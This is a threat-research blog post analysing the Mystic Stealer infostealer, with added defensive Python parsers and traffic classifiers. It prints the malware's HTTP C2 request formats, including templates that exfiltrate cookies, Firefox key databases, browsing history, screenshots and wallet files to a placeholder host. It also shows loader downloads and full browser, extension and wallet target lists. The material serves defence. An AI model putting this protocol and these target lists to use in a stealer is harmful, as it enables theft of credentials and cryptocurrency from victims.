Security Research

Mystic Stealer Revisited


Introduction

Mystic Stealer is a relatively new downloader and information stealer that emerged in early 2023. The malware harvests data from a large number of web browsers and cryptocurrency wallet applications. Mystic can also be used to steal Steam game credentials and arbitrary files from an infected system. Mystic stands out for the level of obfuscation and improvements with each new version of the malware. The code continues to evolve and expand the data theft capabilities and the network communication was updated from a custom binary TCP-based protocol to an HTTP-based protocol. The shift to HTTP may be due to Mystic Stealer failing to beacon back to a C2 server in corporate environments, which frequently block network traffic on non-standard ports. The new modifications have led to increased popularity with criminal threat actors leveraging its loader functionality to distribute additional malware families including RedLine, DarkGate, and GCleaner.

In this blog, we will analyze the latest updates to Mystic Stealer as a follow-up to our previous report.

Key Takeaways

  • Mystic Stealer is an information stealer that was first advertised in April 2023, which targets nearly 40 web browsers and more than 70 browser extensions.
  • Mystic Stealer has been regularly updated with improvements to its code obfuscation, configuration, and methods of communication.
  • The malware’s command and control (C2) communications have been updated from a custom encrypted binary protocol to HTTP.
  • Mystic Stealer has added loader functionality in recent versions to complement its information stealing abilities.
  • Mystic Stealer has been used by numerous threat groups that leverage it to distribute second-stage malware payloads including RedLine, DarkGate, and GCleaner.

Technical Analysis

The latest variant of Mystic Stealer has introduced some notable changes in both the behavior of the malware and in the obfuscation. The entry point of the malware is very similar to the older variant. The malware exits if the current date is past a specific hardcoded expiration date. Figure 1 shows a comparison of the main function between the previous variant and the current variant.


Figure 1: Comparison of the WinMain function for the current and previous Mystic variants

In the latest variant of Mystic Stealer, the decryption of the malware C2s has been moved to a sub-function that is executed after the expiration date check (probably to avoid leaking the C2s in memory if this time check fails).

Embedded C2 Configuration

The algorithm used to decrypt the list of C2s is the same custom XTEA-based algorithm as the previous variant. However, after the custom XTEA layer has been decrypted, there is a sequence of HTTP C2s, separated by a “|” delimiter. The C2 path is stored among the list of obfuscated strings that are constructed and decoded using the stack, as shown in Figure 2.


Figure 2. Mystic Stealer C2 path obfuscation

Information Stealing Configuration

In the previous Mystic Stealer variant, the target lists for web browsers, extensions (and their IDs), and cryptocurrency applications were embedded and obfuscated in the malware. In recent versions, the application target list is now downloaded from the C2 server instead of being hardcoded, as we will examine in the following section.

Communications

In the latest Mystic Stealer variant, all communications between the infected system and the C2 server are performed using HTTP POST requests. Unlike the previous variant that used RC4 to encrypt a custom binary TCP-based protocol, the latest variant does not implement any form of encryption. The data sent in the POST query is Base64 encoded, as shown below:

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="<name>"


BASE64(<data>)
--<boundary>

The response data from the server is also encoded in Base64. The response starts with “OK\r\n” and is followed by any data returned by the C2 server for the specific query.

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK <rest of data for the specific command, if necessary>)

Registration

The infected system (bot) starts communication with the C2 server by sending a POST request with data containing a variable named hwid, which includes a Base64 encoded bot ID generated based on information from the victim’s machine. A second variable with the name build contains the botnet ID, a value that is hardcoded in the binary of the malware. Once the C2 receives these initial two packets, the bot is registered.

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="hwid"

BASE64(0123456789ABCDEF123456)
--<boundary>
Content-Disposition: form-data; name="build"

BASE64(botnet_id)
--<boundary>--

The C2 server generates and returns a session token (a 64-byte lowercase hexadecimal string) that will be used in subsequent packets, together with a set of binary flags that indicate which actions should be performed (take a screenshot, steal browser credentials, steal cryptocurrency wallets, etc.).

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 07 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK <token>1|1|1|1|0|1|1|1|0|1|1)
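
For analysts working from a packet capture, the following added example (not code from the original report or from the malware) decodes a registration response into its session token and flag list. Only positions 4 and 8 are named, because those are the only ones this write-up identifies; the function name and the sample token are assumptions.

```python
import base64
import binascii
import re

# Flag positions named in the write-up (1-based). The other positions are not
# described there, so they are reported by number only.
NAMED_FLAGS = {4: "browser_history", 8: "screenshot"}

# "OK", a separator (the write-up shows both a CRLF and a space after OK), the
# 64-char lowercase hex token, then the pipe-separated 0/1 flags with no gap.
REGISTRATION = re.compile(r"OK\s+([0-9a-f]{64})([01](?:\|[01])*)")


def parse_registration_response(body: bytes) -> dict:
    """Decode a captured registration response body into token and flags."""
    try:
        text = base64.b64decode(body.strip(), validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError) as exc:
        raise ValueError("body is not Base64-encoded ASCII") from exc
    match = REGISTRATION.fullmatch(text.strip())
    if match is None:
        raise ValueError("decoded body is not 'OK <token><flags>'")
    flags = [bit == "1" for bit in match.group(2).split("|")]
    enabled = [NAMED_FLAGS.get(pos, f"position_{pos}")
               for pos, on in enumerate(flags, start=1) if on]
    return {"token": match.group(1), "flags": flags, "enabled": enabled}


# Constructed sample: a placeholder token plus the flag string shown above.
SAMPLE_TOKEN = "0123456789abcdef" * 4
SAMPLE_BODY = base64.b64encode(
    f"OK {SAMPLE_TOKEN}1|1|1|1|0|1|1|1|0|1|1".encode())

if __name__ == "__main__":
    print(parse_registration_response(SAMPLE_BODY))
```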

When the bot submits information to the C2 server, it sends a POST request with:

  • A filename variable containing the name of the file being submitted, Base64 encoded
  • A file variable with the content of the file, also Base64 encoded
  • A token variable with the session token from the registration request

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("example.txt")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of example.txt>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

If the request is valid, the server answers with an OK response.

After registration, the bot sends information about the infected system via a file named SystemInformation.txt that contains information similar to the following:

Build mark: zzzz
IP: {ip}
File Location: C:\Users\xxxx\AppData\Local\Temp\aaaa\bbbb.exe
UserName: xxxx
ComputerName: XXXX
Country: {country}
Location: {location}
Zip code: {zipcode}
TimeZone: {timezone}
HWID: 0123456789ABCDEF012345
Current language: English (United States)
ScreenSize: 1792x1120
Operation System: Windows 10 Pro x64

Available KeyboardLayouts: 
English (United States)

Hardwares: 
CPU: Intel(R) Core(TM) i9-9980HK CPU @ 2.40GHz
GPU: VMware SVGA 3D
RAM: 4293898240ll

Information Stealing

Once Mystic Stealer has registered and reported the infected system information, the binary flags from the C2 server determine whether to conduct data theft and load additional malware payloads. Mystic Stealer sends HTTP POST requests for specific target lists by specifying the value in a msg variable.
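
The request layouts described so far (registration, msg requests and file uploads) can be matched in proxy logs or a packet capture by their structure alone. The following is an added detection example, not code from the original report: the function names, the sample token and the 192.0.2.10 host are assumptions, and the requests it is tested on are constructed.

```python
import base64
import binascii
import re

C2_PATH = "/loghub/master"
USER_AGENT = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)"
FIELD_NAMES = {"hwid", "build", "msg", "token", "filename", "file"}
PART_HEADER = re.compile(
    rb'Content-Disposition: form-data; name="([^"]+)"\r?\n\r?\n')
TOKEN = re.compile(rb"[0-9a-f]{64}")


def extract_fields(body: bytes) -> dict:
    """Map each form-data field name to its decoded value (None if not Base64).

    A value ends at the next boundary line or the next Content-Disposition
    header, so the upload layout shown in this write-up (no boundary line
    before the token part) is parsed as well.
    """
    fields = {}
    headers = list(PART_HEADER.finditer(body))
    for i, header in enumerate(headers):
        end = headers[i + 1].start() if i + 1 < len(headers) else len(body)
        value = re.split(rb"(?:\A|\r?\n)--", body[header.end():end], maxsplit=1)[0]
        try:
            decoded = base64.b64decode(b"".join(value.split()), validate=True)
        except binascii.Error:
            decoded = None
        fields[header.group(1).decode("latin-1")] = decoded
    return fields


def classify_request(raw: bytes):
    """Return a verdict for one raw HTTP request, or None when it does not match."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    request_line = lines[0].split(" ")
    if len(request_line) != 3 or request_line[0] != "POST":
        return None
    headers = {k.strip().lower(): v.strip()
               for k, _, v in (line.partition(":") for line in lines[1:])}
    if not headers.get("content-type", "").lower().startswith("multipart/form-data"):
        return None
    fields = extract_fields(body)
    names = set(fields)
    # Every part must use a known field name and carry a valid Base64 value.
    if not names or not names <= FIELD_NAMES or None in fields.values():
        return None
    if "token" in fields and not TOKEN.fullmatch(fields["token"]):
        return None
    if names <= {"hwid", "build"}:
        kind = "registration"
    elif names == {"msg", "token"}:
        kind = "msg:" + fields["msg"].decode("utf-8", "replace")
    elif names == {"filename", "file", "token"}:
        kind = "upload:" + fields["filename"].decode("utf-8", "replace")
    else:
        return None
    # Path and User-Agent are easy for an operator to change, so they only
    # support the structural match instead of being required for it.
    supporting = [name for name, hit in (
        ("path", request_line[1] == C2_PATH),
        ("user_agent", headers.get("user-agent") == USER_AGENT)) if hit]
    return {"kind": kind, "supporting": supporting}


SAMPLE_TOKEN = b"0123456789abcdef" * 4  # constructed placeholder token


def constructed_request(fields, path=C2_PATH, user_agent=USER_AGENT,
                        boundary_before_last=True) -> bytes:
    """Build a constructed sample request for exercising the classifier."""
    boundary = "xxCONSTRUCTEDxx"
    chunks = []
    for i, (name, value) in enumerate(fields):
        if boundary_before_last or i != len(fields) - 1:
            chunks.append(f"--{boundary}\r\n")
        chunks.append(f'Content-Disposition: form-data; name="{name}"\r\n\r\n')
        chunks.append(base64.b64encode(value).decode() + "\r\n")
    body = "".join(chunks) + f"--{boundary}--\r\n"
    head = (f"POST {path} HTTP/1.1\r\n"
            f"Content-Type: multipart/form-data; boundary={boundary}\r\n"
            f"Content-Length: {len(body)}\r\nUser-Agent: {user_agent}\r\n"
            "Host: 192.0.2.10\r\n\r\n")
    return (head + body).encode("latin-1")


if __name__ == "__main__":
    sample = constructed_request([("msg", b"chromium-browsers"),
                                  ("token", SAMPLE_TOKEN)])
    print(classify_request(sample))
```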

Browsers

Depending on the configuration, Mystic Stealer will steal data from Chromium-based browsers by first requesting a target list from the C2 server.

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("chromium-browsers")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

The Mystic Stealer C2 server will respond with a list of Chromium-based browsers to target. The Appendix section shows the full list of browsers that have been targeted.

Citrio|%localappdata%\CatalinaGroup\Citrio\User Data|Coowon|%localappdata%\Coowon\Coowon\User Data|Liebao|%localappdata%\liebao\User Data|QIP Surf|%localappdata%\QIP Surf\User Data|Orbitum|%localappdata%\Orbitum\User Data|Comodo Dragon|%localappdata%\Comodo\Dragon\User Data|Amigo|%localappdata%\Amigo\User\User Data|Torch|%localappdata%\Torch\User Data|Yandex Browser|%localappdata%\Yandex\YandexBrowser\User Data|Comodo|%localappdata%\Comodo\User Data|360Browser|%localappdata%\360Browser\Browser\User Data|Maxthon3|%localappdata%\Maxthon3\User Data|K-Melon|...

Each element of the list contains the name of the browser and the path where the browser’s data is stored: 

Browser name 1|Browser path 1|..............|Browser N|Browser path N

Mystic Stealer also retrieves a list of browser extensions to target.

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64(extensions)
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

The Mystic Stealer C2 server will return the browser extensions configuration.

Coinbase Wallet|hnfanknocfeofbddgcijnmhnfnkdnaad|Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|EQUAL Wallet|blnieiiffboillknjnepogjhkgnoapac|Jaxx Liberty|cjelfplplebdjjenllpjcblmjkfcffne|BitApp Wallet|fihkakfobkmkjojpchpfgcmhfjnmnfpi|iWallet|kncchdigobghenbbaddojjnnaogfppfj|Wombat|amkmjjmmflddogmhpjloimipbofnfjih|MEW CX|nlbmnnijcnlegkjjpcfjclmcfggfefdm|GuildWallet|nanjmdknhkinifnkgdcggcfnhdaammmj|Saturn Wallet|nkddgncdjgjfcddamfgcmfnlhccnimig|Ronin Wallet|fnjhmkhhmkbjkkabndcnnogagogbneec|NeoLine|cphhlgmgameodnhkjdmkpanlelnlohao|CLV Wallet|nhnkbkgjikgcigadomkphalanndcapjk|Liquality Wallet|kpfopkelmapcoipemfendmdcghnegimn|Terra Station|aiifbnbfobpmeekipheeijimdpnlpgpp|Keplr|dmkamcknogkgcdfhhbddcghachkejeap|Sollet|fhmfendgdocmcbmfikdcogofphimnkno|...

In this case, each element contains the name of the extension and the ID.

Extension name 1|Extension ID 1|....|Extension name N|Extension ID N

Next, the malware downloads the legitimate sqlite3.dll DLL from the C2 server. This library is used to parse web browser SQLite database files.

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("sqlite3")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

The response is the sqlite3 DLL Base64 encoded, as shown below:

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK BASE64(<sqlite3 file>))

The stolen browser data (if any) is sent to the C2 server. For example, cookies stolen from Microsoft Edge (which is Chromium-based) would be exfiltrated, as shown below:

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("Cookies/Microsoft_Edge_Default.txt")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Cookies/Microsoft_Edge_Default.txt>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

Depending on the configuration, Mystic Stealer will also retrieve a list of gecko-browsers to target.

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("gecko-browsers")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

The configuration format is identical to the chromium-browsers list.

Firefox|%appdata%\Mozilla\Firefox\Profiles|Comodo IceDragon|%appdata%\Comodo\IceDragon\Profiles|BlackHawk|%appdata%\NETGATE Technologies\BlackHawk\Profiles|Cyberfox|%appdata%\8pecxstudios\Cyberfox\Profiles|K-Meleon|%appdata%\K-Meleon\Profiles|Icecat|%appdata%\Mozilla\icecat\Profiles

Mystic Stealer will collect a number of database files from Firefox-based browsers containing cookies, certificates, keys, etc., as shown below:

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("Gecko/Firefox/<profile>.default/key4.db")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Gecko/Firefox/<profile>.default/key4.db>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK)

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("Gecko/Firefox/<profile>.default/cert9.db")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Gecko/Firefox/<profile>.default/cert9.db>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK)

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("Cookies/Firefox_<profile>.default.txt")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Cookies/Firefox_<profile>.default.txt>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK)

If the browser history configuration flag (position 4) is set to 1, Mystic Stealer also sends the victim’s browsing history.

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("History/Firefox_8qjvd3qg.default-release.txt")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of History/Firefox_8qjvd3qg.default-release.txt>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

The browser history file contains the website title (if available) and the URL as shown below:

Title: <Title1>
Url: <url1>

===============

Title: <Title2>
Url: <url2>

===============

...

===============

Title: <TitleN>
Url: <urlN>

===============

Screenshots

If the screenshot configuration flag (position 8) is set to 1, Mystic Stealer captures and sends a screenshot of the victim’s machine.

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="filename"

BASE64("Screenshot.jpeg")
--<boundary>
Content-Disposition: form-data; name="file"

BASE64(<content of Screenshot.jpeg>)
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

Files

Mystic Stealer also downloads a list of files to be stolen from the victim.

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("files")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

The Mystic Stealer C2 server returns a list of target files and directories to steal. For example, ThreatLabz has observed this feature used to steal cryptocurrency wallets as shown below:

Wallets/Jaxx Desktop|%appdata%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb|*.*|0|Wallets/Atomic|%appdata%\atomic\Local Storage\leveldb|*.*|0|Wallets/Binance|%appdata%\Binance|app-store.json,simple-storage.json,.finger-print.fp|0|Wallets/Coinomi|%appdata%\Coinomi\Coinomi\wallets|.wallet,*.config|0|Wallets/Exodus|%appdata%\Exodus|exodus.conf.json,window-state.json,passphrase.json,seed.seco,info.seco|1|Wallets/Bitcoin Core|%appdata%\Bitcoin\wallets|wallet.dat|1|Wallets/Bitcoin Core Old|%appdata%\Bitcoin|*wallet*.dat|0|Wallets/Dogecoin|%appdata%\Bitcoin\wallets|*wallet*.dat|0|Wallets/Raven Core|%appdata%\Raven|*wallet*.dat|0|Wallets/Daedalus Mainnet|%appdata%\Daedalus Mainnet\wallets|she*.sqlite|0|Wallets/Blockstream Green|%appdata%\Blockstream\Green\wallets|*.*|1|Wallets/Wasabi Wallet|%appdata%\WalletWasabi\Client\Wallets|*.json|0|Wallets/Ethereum|%appdata%\Ethereum|keystore|0|Wallets/Electrum|%appdata%\Electrum\wallets|*.*|0|Wallets/ElectrumLTC|%appdata%\Electrum-LTC\wallets|*.*|0|Wallets/Electron Cash|%appdata%\ElectronCash\wallets|*.*|0|Wallets/MultiDoge|%appdata%\MultiDoge|multidoge.wallet|0|Wallets/Jaxx Desktop Old|%appdata%\jaxx\Local Storage|file__0.localstorage|0
The format for each targeted file is shown below:

Directory name|Location on disk|Target files mask|Flag

The flag parameter indicates whether Mystic Stealer should recursively search the target directory. Once finished, a “done” msg is sent, to indicate the file stealing task is finished.
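
The pipe-delimited target lists above (name and value pairs for browsers and extensions, four-field records for files) can be turned into structured records for hunting or file-access auditing. This is an added example, not code from the original report: the function and class names are assumptions, the sample strings are excerpts of the lists shown in this post plus one constructed invalid entry, and the 32-character a to p check reflects the Chromium extension ID format.

```python
import re
from dataclasses import dataclass

EXTENSION_ID = re.compile(r"[a-p]{32}")  # Chromium extension ID format


@dataclass(frozen=True)
class FileRule:
    directory: str   # folder name used in the upload, e.g. "Wallets/Exodus"
    location: str    # path on disk, environment variables left unexpanded
    masks: tuple     # comma-separated file masks
    recursive: bool  # flag field: "1" means search the directory recursively


def split_records(config: str, arity: int):
    """Split a pipe-delimited list into records of `arity` fields.

    Returns (records, leftover). leftover holds trailing fields that do not
    form a complete record, for example when a capture was cut short.
    """
    fields = [field.strip() for field in config.strip().split("|")]
    cut = len(fields) - len(fields) % arity
    records = [tuple(fields[i:i + arity]) for i in range(0, cut, arity)]
    return records, fields[cut:]


def parse_file_rules(config: str):
    """Parse 'Directory name|Location on disk|Target files mask|Flag' records."""
    records, leftover = split_records(config, 4)
    rules = []
    for directory, location, masks, flag in records:
        if flag not in ("0", "1"):
            raise ValueError(f"unexpected flag {flag!r} in rule {directory!r}")
        rules.append(FileRule(directory, location, tuple(masks.split(",")),
                              flag == "1"))
    return rules, leftover


def parse_extensions(config: str):
    """Parse 'Extension name|Extension ID' pairs and reject malformed IDs."""
    records, leftover = split_records(config, 2)
    valid = {name: ext_id for name, ext_id in records
             if EXTENSION_ID.fullmatch(ext_id)}
    rejected = [record for record in records
                if not EXTENSION_ID.fullmatch(record[1])]
    return valid, rejected, leftover


# Excerpts of the lists shown in this post.
SAMPLE_FILES = (
    r"Wallets/Exodus|%appdata%\Exodus|exodus.conf.json,window-state.json,"
    r"passphrase.json,seed.seco,info.seco|1|"
    r"Wallets/Bitcoin Core|%appdata%\Bitcoin\wallets|wallet.dat|1|"
    r"Wallets/Electrum|%appdata%\Electrum\wallets|*.*|0"
)
# "Constructed Bad" is a constructed entry; the trailing "..." mimics the
# truncated listing above.
SAMPLE_EXTENSIONS = (
    "Coinbase Wallet|hnfanknocfeofbddgcijnmhnfnkdnaad|"
    "Guarda|hpglfhgfnhbgpjdenjgmdgoeiappafln|"
    "Constructed Bad|not-an-id|..."
)

if __name__ == "__main__":
    for rule in parse_file_rules(SAMPLE_FILES)[0]:
        print(rule)
    print(parse_extensions(SAMPLE_EXTENSIONS))
```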

Loader

A “loader” msg can be sent by Mystic Stealer to the C2 server to request additional second-stage malware payloads, as shown below:

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache

--<boundary>
Content-Disposition: form-data; name="msg"

BASE64("loader")
--<boundary>
Content-Disposition: form-data; name="token"

BASE64(<token>)
--<boundary>--

HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin

BASE64(OK |1|BASE64(exe1)| |1|BASE64(exe2)| ....|1|BASE64(exeN))

The response to the loader request is an initial Base64 encoded layer containing an OK response with a set of one or more Base64 encoded executables:


Figure 3: Base64 encoded executables downloaded by Mystic Stealer

The packet follows this format:

|1|BASE64(exe1)| |1|BASE64(exe2)| ....|1|BASE64(exeN)

The parameter that precedes the Base64 encoded executable does not appear to be currently used, although it may indicate a potential feature that has yet to be implemented such as whether to write the binary to disk or inject it into another process. After downloading and executing these binary payloads, Mystic Stealer sends a final POST request with the message “loadercode”. The C2 server will then return an empty response.
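
During incident response, a captured loader response can be unpacked in memory to obtain hashes of the second-stage payloads for lookup, without writing or running anything. The following is an added triage example, not code from the original report: the function name is an assumption and the two sample payloads are constructed placeholder bytes, not real executables.

```python
import base64
import binascii
import hashlib
import re

# One entry: "|<parameter>|<Base64 payload>". Entries are separated by "| ".
ENTRY = re.compile(r"\|([^|\s]+)\|([A-Za-z0-9+/=]+)")


def triage_loader_response(body: bytes) -> list:
    """Decode both Base64 layers and describe each payload without saving it."""
    try:
        text = base64.b64decode(body.strip(), validate=True).decode("latin-1")
    except binascii.Error as exc:
        raise ValueError("outer layer is not Base64") from exc
    if not text.startswith("OK"):
        raise ValueError("response does not start with OK")
    findings = []
    for index, (param, blob) in enumerate(ENTRY.findall(text[2:]), start=1):
        try:
            payload = base64.b64decode(blob, validate=True)
        except binascii.Error:
            findings.append({"index": index, "param": param,
                             "error": "inner layer is not Base64"})
            continue
        findings.append({
            "index": index,
            "param": param,                      # purpose unknown per the write-up
            "size": len(payload),
            "sha256": hashlib.sha256(payload).hexdigest(),
            "looks_like_pe": payload[:2] == b"MZ",  # DOS header magic
        })
    return findings


# Constructed sample: placeholder bytes, laid out as "OK |1|B64| |1|B64".
SAMPLE_PAYLOADS = [b"MZ" + bytes(62), b"constructed non-PE payload"]
SAMPLE_RESPONSE = base64.b64encode(
    ("OK " + "| ".join("|1|" + base64.b64encode(p).decode()
                       for p in SAMPLE_PAYLOADS)).encode())

if __name__ == "__main__":
    for finding in triage_loader_response(SAMPLE_RESPONSE):
        print(finding)
```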

Debug Builds

Zscaler ThreatLabz has found recent samples compiled in September and October 2023, which contain plaintext strings that typically are obfuscated in other samples:


Figure 4: Mystic Stealer debug version plaintext strings

In addition, these samples have string references with full file paths (instead of a relative path like ..\\chromiumbrowsers.cpp in non-debug samples) to the original C++ code. Interestingly, the username in these full paths is will. ThreatLabz suspects these samples are compiled from code that is still in development where they could be testing improvements and new features.

Conclusion

Even though Mystic Stealer is a relatively new information stealing malware, ThreatLabz has observed a significant increase in threat actors leveraging it to deploy additional malware. The developer behind Mystic Stealer is continuously modifying and improving the code, and the malware is quickly evolving. The C2 communication protocol used by Mystic Stealer has switched from a custom binary protocol to an HTTP-based protocol, likely to improve beaconing from infections in corporate environments that leverage firewalls to filter suspicious network traffic. Based on the number of new Mystic Stealer samples and C2 panels, the malware is likely to continue to pose a threat to organizations.

In addition to staying on top of these threats, Zscaler's ThreatLabz team continuously monitors for new threats and shares its findings with the wider community.

Cloud Sandbox

Zscaler’s multilayered cloud security platform detects indicators related to Mystic Stealer at various levels.

Cloud Sandbox Coverage

Indicators of Compromise (IoCs)

| Hash | First Seen | Expiration Date | Botnet ID | C2 |
|---|---|---|---|---|
| 6203249bebf7248535ff5ef70a7c5a57688b399d91ac63c9d73441af6e65f184 | 2023-10-08 08:36:29 UTC | 2023-11-09T20:02:21 | 15 | hxxp://171.22.28[.]235/loghub/master |
| 7eb8617d09f204dd40541a000f9881019ff103ff330cb0e7aebb8c3a160cfd26 | 2023-09-29 15:30:00 UTC | 2023-10-26T11:48:42 | Chung | hxxp://194.87.31[.]123/loghub/master |
